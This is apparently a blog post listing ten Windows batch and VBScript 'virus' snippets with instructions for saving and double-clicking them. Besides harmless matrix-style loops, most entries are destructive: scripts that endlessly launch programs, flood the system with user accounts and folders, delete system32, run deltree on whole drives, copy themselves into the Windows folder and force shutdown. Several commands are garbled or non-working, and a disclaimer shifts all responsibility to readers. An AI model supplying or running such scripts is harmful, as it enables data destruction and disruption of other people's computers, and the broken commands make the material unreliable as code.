Ad Code

Ticker

6/recent/ticker-posts

Top 10 Computer Virus Codes - Malware Detected

❤️‍🩹 How to make some small viruses ❤️‍🩹

 1. All of these are made like this. First open the NotePad and play the code we give in the same way.


 2. After that, when saving, you need to save eg :- "The name you put in that file should be saved as .bat".


 3. If you double click the bat file that is created next to it, it will be activated.


 I.Matrix Binary


 ⁜This has no effect.

 @echo off

color a

:top

echo %random% %random% %random% %random% %random% 

goto top


II.Matrix Advanced


Even after changing this one a bit, it has no effect.


 @echo off

color 0A

:A

echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2

ping -w .9 >nul

echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e

ping -w .9 >nul

echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z

ping -w .9 >nul

echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d

ping -w .9 >nul

echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a

ping -w .9 >nul

echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a

ping -w .9 >nul

echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t 

ping -w .9 >nul

echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d

ping -w .9 >nul

echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y

ping -w .9 >nul

echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2

ping -w .9 >nul

echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a

ping -w .9 >nul

echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a

ping -w .9 >nul

echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d

ping -w .9 >nul

goto A


III.Application Bomber


This continuously opens things like Paint, notepad, cmd and has a great impact on the performance of your computer. If you try with all the viruses listed below, try either Windows, RDP or VPS in your Virtual Box.


 @echo off // It instructs to hide the commands when batch files is executed

:x //loop variable

start winword

start mspaint //open paint

start notepad

start write

start cmd //open command prompt

start explorer

start control

start calc // open calculator

goto x // infinite loop


IV.User Account Flooder


This causes Windows users to continuously create numbers.

 @echo off

:x

net user %random% /add //create user account

goto x


V.Complete WipeOut 


Your computer will be completely deleted

 The three I put below are more dangerous than a virus.


 @echo offdel *.txt

del *.exe

del *.ininet stop "security"

del c://windows/system32

mkdir O

copy halo.bat O

copy %0 halo.bat %windir%

kill %windir%

kill system.ini

Erases Hard-Drive then shutsdown computer.


VI.Complete hard Drive Erased


Never try these on your regular computer. Matrix is ​​fine.


 hdmemory/release

echo total hard drive erased

echo xJeftabx strikes again!

shutdown -r -f -t0


VII.Destroy Hard Drive


⁜Deletes your entire drive and can't find it.


 @echo off

deltree c://

deltree d://

kill c://

kill d://

Copy halo.bat %0 %windir%

start daily halo.bat

Destroy the hard-drive.


VIII.Anti-Virus


⁜Virus.bat The said file is deleted.


 @echo off

title Antivirus

echo Antivirus

echo created by your name

:start

IF EXIST virus.bat goto infected

IF NOT EXIST virus.bat goto clean

cd C:\Windows\system32

:infected

echo WARNING VIRUS DETECTED!

del virus.bat

pause

goto start

:clean

echo System secure!

pause

exit


IX.Funny Virus


You need to save this in notepad as "funny.vbs" with the comma. This happens when you open it and continue typing after you close it. Where do you find a place to type?



 ⚠️ To stop this, go to the task manager and kill the process called "wscript.exe".


 Set wshshell = wscript.CreateObject("WScript.Shell")

Wshshell.run "notepad"

do

wscript.sleep 400

wshshell.sendkeys "Hi, "

wscript.sleep 400

wshshell.sendkeys "My "

wscript.sleep 400

wshshell.sendkeys "name "

wscript.sleep 200

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "rooty"

wscript.sleep 400

wshshell.sendkeys "predater. "

wscript.sleep 400

wshshell.sendkeys "If "

wscript.sleep 200

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "don't "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "me "

wscript.sleep 400

wshshell.sendkeys "then "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "nobody "

wscript.sleep 200

wshshell.sendkeys "Common, "

wscript.sleep 400

wshshell.sendkeys "man "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "must "

wscript.sleep 400

wshshell.sendkeys "know me. "

wscript.sleep 400

wshshell.sendkeys "Hahahaha! "

wscript.sleep 400

wshshell.sendkeys "I "

wscript.sleep 400

wshshell.sendkeys "am "

wscript.sleep 400

wshshell.sendkeys "so "

wscript.sleep 400

wshshell.sendkeys "much "

wscript.sleep 4000

wshshell.sendkeys "fun. "

wscript.sleep 400

wshshell.sendkeys "Well, "

wscript.sleep 400

wshshell.sendkeys "my "

wscript.sleep 400

wshshell.sendkeys "heart "

wscript.sleep 400

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "melting, "

wscript.sleep 400

wshshell.sendkeys "now "

wscript.sleep 400

wshshell.sendkeys "don't "

wscript.sleep 400

wshshell.sendkeys "cry! "

wscript.sleep 400

wshshell.sendkeys "okay! "

wscript.sleep 400

wshshell.sendkeys "Okay! "

wscript.sleep 400

wshshell.sendkeys "I'll "

wscript.sleep 400

wshshell.sendkeys "stop "

wscript.sleep 400

wshshell.sendkeys "this. "

loop


X.Unlimited Files


This will create files continuously.


@echo off

:top

md %random% 

goto top


 👋 I think this is enough.  Be sure to follow the instructions correctly.


 ⚠️ We will not accept any responsibility that you do or will be done by the above. The responsibility is yours. Test At Your Own Risk. ⚠️

Post a Comment

0 Comments

Ad Code